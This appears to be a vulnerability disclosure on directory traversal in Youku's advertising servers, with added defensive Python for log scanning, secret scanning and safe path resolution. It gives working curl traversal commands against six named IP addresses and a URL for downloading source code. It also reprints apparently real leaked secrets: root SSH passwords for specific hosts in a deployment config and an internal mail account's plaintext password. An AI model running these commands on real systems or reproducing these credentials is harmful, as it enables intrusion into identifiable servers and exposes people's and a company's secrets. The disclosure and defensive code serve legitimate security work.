Youku Server File Reading
Youku Server File Reading and internal information leakage
Several servers in the advertising system are vulnerable to directory traversal: an attacker can read arbitrary files, and the service runs with root permission.
The affected servers are listed below.
curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
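As an added example (not part of the original report), the following Python script shows how a defender would find requests like the ones above in a web server's access log: it percent-decodes each request path (twice, to cover double encoding), walks the path segment by segment, flags any request that climbs above the web root, and counts hits per source address. The log lines, IP addresses and paths are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (common log format). The addresses and
# paths are made up for this example and do not come from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jul/2014:08:01:02 +0800] "GET /../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 HTTP/1.1" 200 312
203.0.113.5 - - [16/Jul/2014:08:01:03 +0800] "GET /..%2f..%2f..%2fetc/shadow HTTP/1.1" 200 1480
198.51.100.7 - - [16/Jul/2014:08:02:10 +0800] "GET /x.gif?id=123 HTTP/1.1" 200 43
198.51.100.7 - - [16/Jul/2014:08:02:11 +0800] "GET /static/../index.html HTTP/1.1" 200 2048
203.0.113.5 - - [16/Jul/2014:08:03:00 +0800] "GET /%2e%2e/%2e%2e/opt/workspace/app.tar.gz HTTP/1.1" 200 99120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def escapes_root(raw_path: str) -> bool:
    """True if the request path, after percent-decoding, climbs above the web root.

    Depth is tracked segment by segment instead of trusting a normalisation
    function: posixpath.normpath("/../x") returns "/x" and silently hides the climb.
    """
    path = raw_path.split("?", 1)[0]
    decoded = unquote(unquote(path))  # second pass catches %252e style double encoding
    depth = 0
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_log(text: str):
    """Return (flagged requests as (ip, path, status) tuples, Counter of hits per ip)."""
    flagged = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if escapes_root(m["path"]):
            flagged.append((m["ip"], m["path"], int(m["status"])))
            per_ip[m["ip"]] += 1
    return flagged, per_ip


if __name__ == "__main__":
    hits, counts = scan_log(SAMPLE_LOG)
    for ip, path, status in hits:
        # A 200 on an escaping path means the server actually served the file;
        # that is an incident, not a WAF tuning note.
        print(f"{ip} {status} {path}")
    print(dict(counts))
```

A path such as /static/../index.html is deliberately not flagged: it stays inside the root, and alerting on every ".." produces noise that hides the real hits.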
Take one of them as an example.
Reading /etc/shadow
Reading the shell history
Reading various configuration files located through the history
# -*- coding: utf-8 -*-
[auctionserver_default]
# Installation root directory
rundir = /opt/workspace/exchange1.2/auctionserver
# Mode (prod/dev)
mode = "prod"
# Number of verticles accepting requests
mainCore = 8
# Number of verticles connected to DSPs
beaconCore = 8
# Domain names of the auction server
serverHosts = ["c.miaozhen.atm.youku.com", "b.miaozhen.atm.youku.com"]
# Port of the auction server
serverPort = 80
# Port of the API opened to the Exchange website
apiPort = 8080
# Default impression monitoring address
impAddr = "http://n.miaozhen.atm.youku.com/x.gif"
# Default click monitoring address
clickAddr = "http://n.miaozhen.atm.youku.com/r.gif"
# Cookie key
mzCookieName = "_ysuid"
# Size of the DSP connection pool; with multiple beacons it is effectively multiplied by the number of beacons
clientPoolSize = 100
# Maximum length of the HTTP pipeline queue
clientMaxPipelineSize = 200
clientConnectionTimeout = 300
serverIdleTimeout = 700
# Whether a service timeout is required
needServiceTimeout = "false"
# Special request "miaozhen1234"
isNoticeInPm = "true"
# Check domain; takes priority
isCheckDomain = "true"
isCheckHost = "false"
isCheckToken = "false"
token = "testToken"
# isYouku = "true"
useIPsClient = "true"
# dmp
isDMP = "false"
dmpHost = "127.0.0.1"
dmpPort = 6379
dmpKey = "YK_"
dmpSep = ","
# Exchange website address
websiteHost = "ingress"
websitePort = 80
websiteIps = ["220.181.154.177", "123.126.99.87", "10.103.20.174"]
websiteHeaderHost = "ingress"
# Registration interface; no need to modify
registerApi = "/server/api/addAuction"
# Budget request interface; no need to modify
budgetApi = "/pull/api/budget/take"
# Address of the Redis that receives the auction log output; defaults to local
redisHost = "127.0.0.1"
redisPort = 6379
keyBudget = "exchange_auction_budget_backup"
# auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver"
# Whether to display system logs
isShowLog = "true"
# Log retention days
logReservedDays = 30
days = ""
budgetPort = 8281
budgetHost = "Hangzhou"
mappingDmpPort = 6380
mappingDmpHost = ""
mappingDspQps = 1
mappingDspUrl = ""
mappingDspId = ""
forwardPath = "/"
forwardPort = 1234
forwardHost = "127.0.0.1"
isForward = "false"
heapSize = 10
# Start and stop scripts
start = bash bin/start.sh
stop = bash bin/stop.sh
check = bash bin/check.sh
restart = bash bin/restart.sh
start_retry = bash bin/start_retry.sh
stop_retry = bash bin/stop_retry.sh
backup = bash bin/backup.sh
# Target machine password for installation
# sshpass = "123456"
# Target machine port for installation
sshport = "1111"

[auctionserver_01]
# Target machine user and domain name (ip) for installation
node = root@220.181.154.180
sshpass = "ocf(*XzhWt4K"
# Name of the auction server
serverName = "a05.exchange.ad.b28.youku"

[auctionserver_02]
# Target machine user and domain name (ip) for installation
node = root@220.181.154.181
sshpass = "isC*&7cjpZCW"
# Name of the auction server
serverName = "a06.exchange.ad.b28.youku"

# [auctionserver_03]
# Target machine user and domain name (ip) for installation
# node = root@220.181.154.183
# sshpass = "wzxJ^#jsQJKv"
# Name of the auction server
# serverName = "a08.exchange.ad.b28.youku"
Some of the key file paths found this way:
/opt/workspace/exchange1.2/reportserver/run/start.sh
/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt
/opt/workspace/exchange1.2/reportserver/config/mergelog.list
/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt
/home/zczhao/warn/sendlog.perl
/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf
/home/zczhao/cron/reporttab
0 2 * * * /home/zczhao/clear/clear_log.sh
0 2 * * * /home/zczhao/clear/clear_bz2.sh
0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log
#*/10 * * * * /home/zczhao/warn/disk_warn.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh
/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh
sendlog.perl contains an internal email account and its password:
my $mail_smtp = 'mail.youku.com';
my $mail_from = 'systeminformation@youku.com';
my $mail_to = 'dawei.zhang@youku.com';
my $auth_id = 'systeminformation';
my $auth_passwd = '111aaaAAA';
my $subject = "Warn from adExchange13 ($date).";
my $body = `cat /home/zczhao/warn/warn_log`;
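Both the deployment config above and this Perl script leak credentials the same way: a password sits in plaintext next to a key name that announces what it is. As an added example (not part of the original report), the Python below is a small scanner that covers both formats, INI style key = "value" and Perl style my $key = 'value', reports every credential-looking assignment with its value masked, and also reports commented-out lines, since an old password behind a "#" is still a leak. The sample fragments, hosts and values are constructed for the example and are not real credentials.

```python
import re

# Constructed sample fragments in the two formats seen on this page: an INI
# deployment config and a Perl notification script. Every host and value
# below is made up for the example; none is a real credential.
SAMPLE_INI = """\
[auctionserver_default]
# Install the target machine password
# sshpass = "123456"
sshport = "1111"
redisHost = "127.0.0.1"

[auctionserver_01]
node = root@192.0.2.10
sshpass = "EXAMPLE-pw-1"
serverName = "a05.example.internal"
"""

SAMPLE_PERL = """\
my $mail_smtp = 'mail.example.com';
my $auth_id = 'systeminformation';
my $auth_passwd = 'EXAMPLE-pw-2';
my $subject = "Warn from adExchange13 ($date).";
"""

# Match on the key name, not on the value: passwords have no reliable shape,
# but the keys that hold them are predictable.
SECRET_KEY_RE = re.compile(r"pass(wd|word)?|secret|token", re.I)
# One regex for both styles:  key = "value"   and   my $key = 'value';
ASSIGN_RE = re.compile(
    r"""^(?:my\s+\$)?(?P<key>[A-Za-z_]\w*)\s*=\s*["']?(?P<val>[^"';]*)["']?"""
)


def mask(value: str) -> str:
    """Keep two characters so a finding can be matched to its source
    without copying the whole secret into the report."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def find_secrets(text: str, source: str):
    """Return (source, line_no, key, masked_value, was_commented) for every
    assignment whose key looks like a credential."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        body = line.strip()
        commented = body.startswith("#")
        if commented:
            body = body.lstrip("#").strip()
        m = ASSIGN_RE.match(body)
        if not m or not SECRET_KEY_RE.search(m["key"]):
            continue
        val = m["val"].strip()
        # Flags such as isCheckToken = "false" match the key pattern but are not secrets.
        if not val or val.lower() in ("true", "false"):
            continue
        findings.append((source, no, m["key"], mask(val), commented))
    return findings


if __name__ == "__main__":
    for src, no, key, masked, commented in (
        find_secrets(SAMPLE_INI, "deploy.ini") + find_secrets(SAMPLE_PERL, "sendlog.perl")
    ):
        print(f"{src}:{no} {key} = {masked}{' (commented out)' if commented else ''}")
```

Run over a checkout before deployment, this is the check that would have flagged the sshpass entries and $auth_passwd before they reached a server that could be read from the internet; the remediation is to move such values into a secrets store or a root-only file outside the web-reachable tree.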
By the way, the source code can be downloaded the same way:
http://220.181.185.228/.../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz
Solution:
Strengthen filtering of the request path so that it cannot escape the web root.
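As an added illustration of what stronger path filtering means in practice (example code, not Youku's own), the Python below contrasts the naive concatenation that produces this kind of leak with a resolver that decodes the request path, resolves it with realpath under the document root and rejects anything that lands outside, including a symlink inside the root that points out of it, which a purely lexical ".." filter would miss. The document root, files and request paths are constructed in a temporary directory for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


def naive_resolve(root: str, request_path: str) -> str:
    """The pattern that leaks files: root and request path are glued together,
    so the '..' segments survive and /../../etc/passwd walks out of root."""
    return root + request_path


def safe_resolve(root: str, request_path: str):
    """Return the absolute file path under root, or None if the request escapes it.

    Decodes twice to defeat double encoding, resolves symlinks with realpath,
    then checks containment with a separator-aware prefix test so that
    /srv/www-private is not mistaken for something under /srv/www.
    """
    decoded = unquote(unquote(request_path.split("?", 1)[0]))
    if "\x00" in decoded:  # NUL truncation tricks in older runtimes
        return None
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, decoded.lstrip("/")))
    prefix = real_root.rstrip(os.sep) + os.sep
    if candidate != real_root and not candidate.startswith(prefix):
        return None
    return candidate


def demo():
    """Build a throwaway document root and run the safe resolver over a set of
    constructed requests. Returns {request: True if served, False if refused}."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.makedirs(os.path.join(root, "static"))
    with open(os.path.join(root, "static", "x.gif"), "wb") as f:
        f.write(b"GIF89a")
    outside = os.path.join(base, "outside.txt")
    with open(outside, "w") as f:
        f.write("not for the web\n")
    # A symlink inside the root pointing outside it: realpath catches this,
    # a lexical '..' filter alone does not.
    os.symlink(outside, os.path.join(root, "static", "link"))

    requests = [
        "/static/x.gif",              # ordinary file, allowed
        "/static/../static/x.gif",    # '..' that stays inside root, allowed
        "/../outside.txt",            # plain traversal, refused
        "/..%2f..%2foutside.txt",     # encoded traversal, refused
        "/static/link",               # symlink escaping root, refused
    ]
    return {r: safe_resolve(root, r) is not None for r in requests}


if __name__ == "__main__":
    for request, served in demo().items():
        print(f"{'serve ' if served else 'refuse'} {request}")
```

The containment check is done on the realpath result, not on the request string, because the request string is what the attacker controls; the only fact the server can trust is where the filesystem says the resolved path actually is.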